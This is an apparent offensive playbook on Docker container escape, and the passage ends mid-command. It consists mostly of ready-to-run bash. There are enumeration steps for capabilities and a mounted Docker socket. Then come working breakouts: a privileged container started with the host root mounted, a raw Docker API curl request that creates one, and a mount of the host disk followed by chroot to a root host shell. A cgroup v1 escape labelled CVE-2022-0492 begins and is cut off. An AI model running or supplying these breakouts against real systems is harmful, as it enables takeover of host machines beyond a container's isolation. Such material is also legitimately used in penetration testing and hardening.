container-escapelisted

# Container Escape ## Phase 1 — Enumerate Container Context ```bash # Am I in a container? cat /proc/1/cgroup | grep docker ls /.dockerenv # What privileges do I have? cat /proc/self/status | grep Cap capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}') # Is Docker socket mounted? ls -la /var/run/docker.sock # Is the container privileged? ip link add dummy0 type dummy 2>&1 | grep -v "Permission denied" # → if no error, you likely have CAP_NET_ADMIN (privileged indicator) ``` ## Attack 1 — Docker Socket Escape If `/var/run/docker.sock` is mounted: ```bash # Start a new privileged container with host filesystem mounted docker -H unix:///var/run/docker.sock run -it --rm \ --privileged --pid=host --net=host \ -v /:/host ubuntu chroot /host # OR via API directly (no docker CLI needed) curl -s --unix-socket /var/run/docker.sock \ -X POST "http://localhost/containers/create" \ -H "Content-Type: application/json" \ -d '{"Image":"ubuntu","Cmd":["/bin/bash"],"HostConfig":{"Binds":["/:/host"],"Privileged":true}}' ``` ## Attack 2 — Privileged Container Breakout ```bash # Mount host filesystem via device access fdisk -l # find host disk (e.g., /dev/xvda1) mkdir /mnt/host mount /dev/xvda1 /mnt/host chroot /mnt/host /bin/bash # shell as root on host ``` ## Attack 3 — cgroup v1 Escape (CVE-2022-0492) ```bash # Requires CAP_SYS_ADMIN or unconfined seccomp mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp mkdir /tmp/cgr